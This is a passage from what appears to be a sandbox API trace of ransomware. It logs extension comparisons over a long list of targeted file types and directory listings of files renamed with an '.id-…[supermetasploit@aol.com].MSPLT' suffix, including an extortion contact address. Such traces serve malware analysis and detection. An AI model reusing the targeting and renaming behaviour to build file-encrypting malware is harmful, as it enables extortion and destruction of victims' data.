lpString2="SPLT") returned -1 [0284.245] lstrlenW (lpString=".csv") returned 4 [0284.245] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0284.245] lstrlenW (lpString=".cub") returned 4 [0284.245] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0284.245] lstrlenW (lpString=".dae") returned 4 [0284.245] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0284.245] lstrlenW (lpString=".dat") returned 4 [0284.245] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0284.245] lstrlenW (lpString=".db") returned 3 [0284.245] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0284.245] lstrlenW (lpString=".dbf") returned 4 [0284.246] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0284.246] lstrlenW (lpString=".dbx") returned 4 [0284.246] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0284.246] lstrlenW (lpString=".dc3") returned 4 [0284.246] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0284.246] lstrlenW (lpString=".dcm") returned 4 [0284.246] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0284.246] lstrlenW (lpString=".dcr") returned 4 [0284.246] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0284.246] lstrlenW (lpString=".der") returned 4 [0284.246] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0284.246] lstrlenW (lpString=".dib") returned 4 [0284.246] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0284.246] lstrlenW (lpString=".dic") returned 4 [0284.246] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0284.246] lstrlenW (lpString=".dif") returned 4 [0284.246] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0284.246] lstrlenW (lpString=".divx") returned 5 [0284.246] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0284.246] lstrlenW (lpString=".djvu") returned 5 [0284.246] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0284.246] lstrlenW (lpString=".dng") returned 4 [0284.246] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0284.246] lstrlenW (lpString=".doc") returned 4 [0284.247] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0284.247] lstrlenW (lpString=".docm") returned 5 [0284.247] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0284.247] lstrlenW (lpString=".docx") returned 5 [0284.247] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0284.247] lstrlenW (lpString=".dot") returned 4 [0284.247] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0284.247] lstrlenW (lpString=".dotm") returned 5 [0284.247] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0284.247] lstrlenW (lpString=".dotx") returned 5 [0284.247] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0284.247] lstrlenW (lpString=".dpx") returned 4 [0284.247] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0284.247] lstrlenW (lpString=".dqy") returned 4 [0284.247] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0284.247] lstrlenW (lpString=".dsn") returned 4 [0284.247] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0284.247] lstrlenW (lpString=".dt") returned 3 [0284.247] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0284.247] lstrlenW (lpString=".dtd") returned 4 [0284.247] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0284.247] lstrlenW (lpString=".dwg") returned 4 [0284.248] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0284.248] lstrlenW (lpString=".dwt") returned 4 [0284.248] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0284.248] lstrlenW (lpString=".dx") returned 3 [0284.248] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0284.248] lstrlenW (lpString=".dxf") returned 4 [0284.248] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0284.248] lstrlenW (lpString=".edml") returned 5 [0284.248] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0284.248] lstrlenW (lpString=".efd") returned 4 [0284.248] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0284.248] lstrlenW (lpString=".elf") returned 4 [0284.248] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0284.248] lstrlenW (lpString=".emf") returned 4 [0284.248] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0284.248] lstrlenW (lpString=".emz") returned 4 [0284.248] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0284.248] lstrlenW (lpString=".epf") returned 4 [0284.248] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0284.248] lstrlenW (lpString=".eps") returned 4 [0284.248] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0284.248] lstrlenW (lpString=".epsf") returned 5 [0284.248] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0284.248] lstrlenW (lpString=".epsp") returned 5 [0284.248] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0284.248] lstrlenW (lpString=".erf") returned 4 [0284.249] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0284.249] lstrlenW (lpString=".exr") returned 4 [0284.249] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned -1 [0284.249] lstrlenW (lpString=".f4v") returned 4 [0284.249] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0284.249] lstrlenW (lpString=".fido") returned 5 [0284.249] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0284.249] lstrlenW (lpString=".flm") returned 4 [0284.249] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0284.249] lstrlenW (lpString=".flv") returned 4 [0284.249] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0284.249] lstrlenW (lpString=".frm") returned 4 [0284.249] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0284.249] lstrlenW (lpString=".fxg") returned 4 [0284.249] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0284.249] lstrlenW (lpString=".geo") returned 4 [0284.249] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0284.249] lstrlenW (lpString=".gif") returned 4 [0284.249] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0284.249] lstrlenW (lpString=".grs") returned 4 [0284.249] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0284.249] lstrlenW (lpString=".gz") returned 3 [0284.249] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0284.249] lstrlenW (lpString=".h") returned 2 [0284.250] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0284.250] lstrlenW (lpString=".hdr") returned 4 [0284.250] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0284.250] lstrlenW (lpString=".hpp") returned 4 [0284.250] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0284.250] lstrlenW (lpString=".hta") returned 4 [0284.250] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0284.250] lstrlenW (lpString=".htc") returned 4 [0284.250] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0284.250] lstrlenW (lpString=".htm") returned 4 [0284.250] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0284.250] lstrlenW (lpString=".html") returned 5 [0284.250] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0284.250] lstrlenW (lpString=".icb") returned 4 [0284.250] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0284.250] lstrlenW (lpString=".ics") returned 4 [0284.250] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0284.250] lstrlenW (lpString=".iff") returned 4 [0284.250] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0284.250] lstrlenW (lpString=".inc") returned 4 [0284.250] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0284.250] lstrlenW (lpString=".indd") returned 5 [0284.250] lstrcmpiW (lpString1=".indd", lpString2="MSPLT") returned -1 [0284.250] lstrlenW (lpString=".ini") returned 4 [0284.251] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0284.251] lstrlenW (lpString=".iqy") returned 4 [0284.251] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0284.251] lstrlenW (lpString=".j2c") returned 4 [0284.251] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0284.251] lstrlenW (lpString=".j2k") returned 4 [0284.251] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0284.251] lstrlenW (lpString=".java") returned 5 [0284.251] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0284.251] lstrlenW (lpString=".jp2") returned 4 [0284.251] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0284.251] lstrlenW (lpString=".jpc") returned 4 [0284.251] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0284.251] lstrlenW (lpString=".jpe") returned 4 [0284.251] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0284.251] lstrlenW (lpString=".jpeg") returned 5 [0284.251] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0284.251] lstrlenW (lpString=".jpf") returned 4 [0284.251] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0284.251] lstrlenW (lpString=".jpg") returned 4 [0284.251] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0284.251] lstrlenW (lpString=".jpx") returned 4 [0284.251] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0284.251] lstrlenW (lpString=".js") returned 3 [0284.252] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0284.252] lstrlenW (lpString=".jsf") returned 4 [0284.252] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0284.252] lstrlenW (lpString=".json") returned 5 [0284.252] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0284.252] lstrlenW (lpString=".jsp") returned 4 [0284.252] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0284.252] lstrlenW (lpString=".kdc") returned 4 [0284.252] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0284.252] lstrlenW (lpString=".kmz") returned 4 [0284.252] lstrcmpiW (lpString1=".kmz", lpString2="SPLT") returned -1 [0284.252] lstrlenW (lpString=".kwm") returned 4 [0284.252] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0284.252] lstrlenW (lpString=".lasso") returned 6 [0284.252] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0284.252] lstrlenW (lpString=".lbi") returned 4 [0284.252] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0284.252] lstrlenW (lpString=".lgf") returned 4 [0284.252] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0284.252] lstrlenW (lpString=".lgp") returned 4 [0284.252] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0284.253] lstrlenW (lpString=".log") returned 4 [0284.253] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0284.253] lstrlenW (lpString=".m1v") returned 4 [0284.253] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0284.253] lstrlenW (lpString=".m4a") returned 4 [0284.253] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0284.253] lstrlenW (lpString=".m4v") returned 4 [0284.253] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0284.253] lstrlenW (lpString=".max") returned 4 [0284.253] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0284.253] lstrlenW (lpString=".md") returned 3 [0284.253] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0284.253] lstrlenW (lpString=".mda") returned 4 [0284.253] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0284.253] lstrlenW (lpString=".mdb") returned 4 [0284.253] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0284.253] lstrlenW (lpString=".mde") returned 4 [0284.253] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0284.254] lstrlenW (lpString=".mdf") returned 4 [0284.254] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0284.254] lstrlenW (lpString=".mdw") returned 4 [0284.254] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0284.254] lstrlenW (lpString=".mef") returned 4 [0284.254] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0284.254] lstrlenW (lpString=".mft") returned 4 [0284.254] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0284.254] lstrlenW (lpString=".mfw") returned 4 [0284.254] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0284.254] lstrlenW (lpString=".mht") returned 4 [0284.254] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0284.254] lstrlenW (lpString=".mhtml") returned 6 [0284.254] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0284.254] lstrlenW (lpString=".mka") returned 4 [0284.254] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0284.254] lstrlenW (lpString=".mkidx") returned 6 [0284.254] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0284.254] lstrlenW (lpString=".mkv") returned 4 [0284.255] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0284.255] lstrlenW (lpString=".mos") returned 4 [0284.255] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0284.255] lstrlenW (lpString=".mov") returned 4 [0284.255] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0284.255] lstrlenW (lpString=".mp3") returned 4 [0284.255] lstrcmpiW (lpString1=".mp3", lpString2="SPLT") returned -1 [0284.255] lstrlenW (lpString=".mp4") returned 4 [0284.255] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0284.255] lstrlenW (lpString=".mpeg") returned 5 [0284.255] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0284.255] lstrlenW (lpString=".mpg") returned 4 [0284.255] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0284.255] lstrlenW (lpString=".mpv") returned 4 [0284.255] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0284.255] lstrlenW (lpString=".mrw") returned 4 [0284.255] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0284.255] lstrlenW (lpString=".msg") returned 4 [0284.255] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0284.256] lstrlenW (lpString=".mxl") returned 4 [0284.256] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0284.256] lstrlenW (lpString=".myd") returned 4 [0284.256] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0284.256] lstrlenW (lpString=".myi") returned 4 [0284.256] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0284.256] lstrlenW (lpString=".nef") returned 4 [0284.256] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0284.256] lstrlenW (lpString=".nrw") returned 4 [0284.256] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0284.256] lstrlenW (lpString=".obj") returned 4 [0284.256] lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0284.256] lstrlenW (lpString=".odb") returned 4 [0284.256] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0284.421] lstrlenW (lpString=".odc") returned 4 [0284.421] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0284.421] lstrlenW (lpString=".odm") returned 4 [0284.421] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0284.421] lstrlenW (lpString=".odp") returned 4 [0284.421] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0284.421] lstrlenW (lpString=".ods") returned 4 [0284.421] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0284.421] lstrlenW (lpString=".oft") returned 4 [0284.421] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0284.421] lstrlenW (lpString=".one") returned 4 [0284.421] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0284.421] lstrlenW (lpString=".onepkg") returned 7 [0284.421] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0284.421] lstrlenW (lpString=".onetoc2") returned 8 [0284.421] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0284.421] lstrlenW (lpString=".opt") returned 4 [0284.421] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0284.421] lstrlenW (lpString=".oqy") returned 4 [0284.421] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0284.421] lstrlenW (lpString=".orf") returned 4 [0284.421] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0284.421] lstrlenW (lpString=".p12") returned 4 [0284.421] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0284.421] lstrlenW (lpString=".p7b") returned 4 [0284.422] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0284.422] lstrlenW (lpString=".p7c") returned 4 [0284.422] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0284.422] lstrlenW (lpString=".pam") returned 4 [0284.422] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0284.422] lstrlenW (lpString=".pbm") returned 4 [0284.422] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0284.422] lstrlenW (lpString=".pct") returned 4 [0284.422] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0284.422] lstrlenW (lpString=".pcx") returned 4 [0284.422] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0284.422] lstrlenW (lpString=".pdd") returned 4 [0284.422] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0284.422] lstrlenW (lpString=".pdf") returned 4 [0284.422] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0284.422] lstrlenW (lpString=".pdp") returned 4 [0284.422] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0284.422] lstrlenW (lpString=".pef") returned 4 [0284.422] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0284.422] lstrlenW (lpString=".pem") returned 4 [0284.422] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0284.422] lstrlenW (lpString=".pff") returned 4 [0284.422] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0284.423] lstrlenW (lpString=".pfm") returned 4 [0284.423] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0284.423] lstrlenW (lpString=".pfx") returned 4 [0284.423] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0284.423] lstrlenW (lpString=".pgm") returned 4 [0284.423] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0284.423] lstrlenW (lpString=".php") returned 4 [0284.423] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0284.423] lstrlenW (lpString=".php3") returned 5 [0284.423] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0284.423] lstrlenW (lpString=".php4") returned 5 [0284.423] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 [0284.423] lstrlenW (lpString=".php5") returned 5 [0284.423] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0284.423] lstrlenW (lpString=".phtml") returned 6 [0284.423] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0284.423] lstrlenW (lpString=".pict") returned 5 [0284.423] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0284.423] lstrlenW (lpString=".pl") returned 3 [0284.423] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0284.423] lstrlenW (lpString=".pls") returned 4 [0284.423] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0284.423] lstrlenW (lpString=".pm") returned 3 [0284.423] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0284.423] lstrlenW (lpString=".png") returned 4 [0284.424] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0284.424] lstrlenW (lpString=".pnm") returned 4 [0284.424] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0284.424] lstrlenW (lpString=".pot") returned 4 [0284.424] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0284.424] lstrlenW (lpString=".potm") returned 5 [0284.424] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned -1 [0284.424] lstrlenW (lpString=".potx") returned 5 [0284.424] lstrcmpiW (lpString1=".potx", lpString2="MSPLT") returned -1 [0284.424] lstrlenW (lpString=".ppa") returned 4 [0284.424] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0284.424] lstrlenW (lpString=".ppam") returned 5 [0284.424] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0284.424] lstrlenW (lpString=".ppm") returned 4 [0284.424] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0284.424] lstrlenW (lpString=".pps") returned 4 [0284.424] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0284.424] lstrlenW (lpString=".ppsm") returned 5 [0284.424] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0284.424] lstrlenW (lpString=".ppt") returned 4 [0284.424] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0284.424] lstrlenW (lpString=".pptm") returned 5 [0284.424] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0284.424] lstrlenW (lpString=".pptx") returned 5 [0284.424] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0284.424] lstrlenW (lpString=".prn") returned 4 [0284.424] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0284.425] lstrlenW (lpString=".ps") returned 3 [0284.425] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0284.425] lstrlenW (lpString=".psb") returned 4 [0284.425] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0284.425] lstrlenW (lpString=".psd") returned 4 [0284.425] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0284.425] lstrlenW (lpString=".pst") returned 4 [0284.425] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0284.425] lstrlenW (lpString=".ptx") returned 4 [0284.425] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0284.425] lstrlenW (lpString=".pub") returned 4 [0284.425] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0284.425] lstrlenW (lpString=".pwm") returned 4 [0284.425] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0284.425] lstrlenW (lpString=".pxr") returned 4 [0284.425] lstrcmpiW (lpString1=".pxr", lpString2="SPLT") returned -1 [0284.425] lstrlenW (lpString=".py") returned 3 [0284.425] lstrcmpiW (lpString1=".py", lpString2="PLT") returned -1 [0284.425] lstrlenW (lpString=".qt") returned 3 [0284.425] lstrcmpiW (lpString1=".qt", lpString2="PLT") returned -1 [0284.425] lstrlenW (lpString=".r3d") returned 4 [0284.425] lstrcmpiW (lpString1=".r3d", lpString2="SPLT") returned -1 [0284.425] lstrlenW (lpString=".raf") returned 4 [0284.425] lstrcmpiW (lpString1=".raf", lpString2="SPLT") returned -1 [0284.425] lstrlenW (lpString=".rar") returned 4 [0284.425] lstrcmpiW (lpString1=".rar", lpString2="SPLT") returned -1 [0284.425] lstrlenW (lpString=".raw") returned 4 [0284.426] lstrcmpiW (lpString1=".raw", lpString2="SPLT") returned -1 [0284.426] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c0e434b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c0e434b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c0e434b, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xee06, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0284.426] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5be5bbc3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5be5bbc3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bea7fff, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0284.426] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5be5bbc3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5be5bbc3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bea7fff, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0284.426] FindClose (in: hFindFile=0x39481a8 | out: hFindFile=0x39481a8) returned 1 [0284.427] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0284.524] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2070", cAlternateFileName="")) returned 1 [0284.524] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.527] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947f28 [0284.531] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.533] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bece217, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bece217, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5befd752, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1094, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0284.543] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, 